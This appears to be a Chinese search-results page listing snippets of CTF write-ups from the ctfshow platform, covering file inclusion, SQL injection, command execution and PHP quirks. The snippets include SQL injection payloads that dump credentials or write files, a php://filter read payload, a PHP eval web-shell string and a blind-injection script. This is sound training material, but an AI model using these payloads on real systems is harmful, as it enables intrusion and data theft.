搜索结果
查询Tags标签: ctfshow,共有 49条记录-
ctfshow—文件包含
参考 PHP伪协议总结 - SegmentFault 思否WEB78 无防护读取源码<?phpif(isset($_GET[file])){$file = $_GET[file];include($file); }else{highlight_file(__FILE__); }伪协议读取后base64解密payload:?file=php://filter/convert.base6…
2022/7/31 6:22:48 人评论 次浏览 -
【CTFshow】Web入门-php特性(104-113)wp
Web104(Hash函数)你有没有发现,这里没有要求v1和v2不相等...... Web105(变量覆盖,$$可变变量)这里涉及到两个美元符\$\$,这种变量叫可变变量,最直观的理解:输出结果是world,\$\$a就相当于是\$(\$a)=\$hello。 我们可以发现要想输出最终的flag变量,要满足两个fo…
2022/7/14 14:56:08 人评论 次浏览 -
SQL注入 进阶绕过技巧
hex/哈希值绕过 1 union select hex(id),hex(username),hex(password) from ctfshow_web.ctfshow_user3--+ 如果回显点少的话,可以在后面加上limit 3,5# 即表示,从第三列数据开始输出五列base64加密绕过 1 union select 1,to_base64(username),to_base64(password) f…
2022/6/30 2:52:42 人评论 次浏览 -
[ctfshow]Web签到题
Web签到题 题目描述 无 题目解析题目非常的简单,只有一行文字:where is flag?我们直接右键查看源代码,发现有一行被注释掉的内容看着像是被编码过的内容,尝试用Base64解码,Nice~
2022/6/22 23:26:32 人评论 次浏览 -
[ctfshow]Web2
Web2 题目描述 最简单的SQL注入 题目解析打开页面发现有一个表单,根据题目的描述可以确定,这是一个SQL注入题目。手动填写数据包进行发送一次,用burp suite抓取数据包。构造SQL注入语句,这是一个登录功能,那应该考虑是字符串注入,在username后面加上 or 1=1 #发送…
2022/6/22 23:26:07 人评论 次浏览 -
ctf_show-web入门-其他-(406-422)
406http://www.baidu.com;union/**/select/**/1,(select/**/flag/**/from/**/flag)/**/into/**/outfile/**/"/var/www/html/flag.txt"%23 407?ip=cafe::addip6地址,类的名字叫cafe都是16进制408?email="<?php eval($_POST[1]);?>"@123.php…
2022/5/1 6:13:02 人评论 次浏览 -
ctfshow-大赛原题(680-685)
web680 post传入code=phpinfo();有回显 查看disable_functions,发现这些被禁用assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstoped,pcntl_wifsignaled,pcntl_wexitst…
2022/4/28 6:12:50 人评论 次浏览 -
CTFshow——funnyrsa1的wp理解
题目如下: 题目分析: 拿到题,发现给的e不常规,p1和p2相等,有两个不同n,两个不同c和两个不同e。给定两个密文的情况下,通常需要找到两者之间存在的关系,“合并”密文求解才能得到正确的明文。先计算phi1和phi2,然后分别计算e和phi的gcd,发现都等于14,所以这里问…
2022/4/19 6:13:01 人评论 次浏览 -
SQL注入-2
简单盲注 import requests import timeresult = "" url = http://986b6ffa-086c-4650-8237-9557e9bd100c.challenge.ctf.show/api/for i in range(80):min_num = 32max_num = 127while True:mid_num = (min_num + max_num) >> 1if mid_num == min_num:res…
2022/4/5 2:18:59 人评论 次浏览 -
ctfshow 入门web 信息搜集部分wp
web1右键查看源码 得到flagweb2 无法查看源代码通过Ctrl+u或者在url前面添加view-source:也可获得flag 或直接bp抓包得到flag web3bp抓包查看响应头得到flag web4看提示 直接url后加robots.txt然后根据网页提示得到flag web5直接url后加index.phps可参考 WEB源码泄露 - NP…
2022/2/5 23:43:11 人评论 次浏览 -
ctfshow-web42(命令执行)
shell重定向 /dev/null 2>&1 让所有的输出流(包括错误的和正确的)都定向到空设备丢弃<?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 20:51:55 # @email:…
2022/1/25 23:35:07 人评论 次浏览 -
1.22
ctfshowweb5 进入题目<?php$flag="";$v1=$_GET[v1];$v2=$_GET[v2];if(isset($v1) && isset($v2)){if(!ctype_alpha($v1)){die("v1 error");}if(!is_numeric($v2)){die("v2 error");}if(md5($v1)==md5($v2)){echo $flag;}}else{…
2022/1/22 23:37:22 人评论 次浏览 -
ctfshow-web94(php特征)
strpos函数限制了传参第一位不能为0,如果为0,就die. 但是如果找不到的话又会die. <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-18 16:46:19 # @link: https://ct…
2022/1/13 20:07:36 人评论 次浏览 -
ctfshow-web94(php特征)
strpos函数限制了传参第一位不能为0,如果为0,就die. 但是如果找不到的话又会die. <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-18 16:46:19 # @link: https://ct…
2022/1/13 20:07:36 人评论 次浏览 -
thinkphp 专题
thinkphp完全开发手册 https://www.kancloud.cn/manual/thinkphp/1678 569 pathinfo的运用 四种模式 1.普通模式也就是传统的GET传参方式来指定当前访问的模块和操作,例如: http://localhost/?m=home&c=user&a=login&var=value m参数表示模块,c参数表示控…
2022/1/11 1:03:25 人评论 次浏览
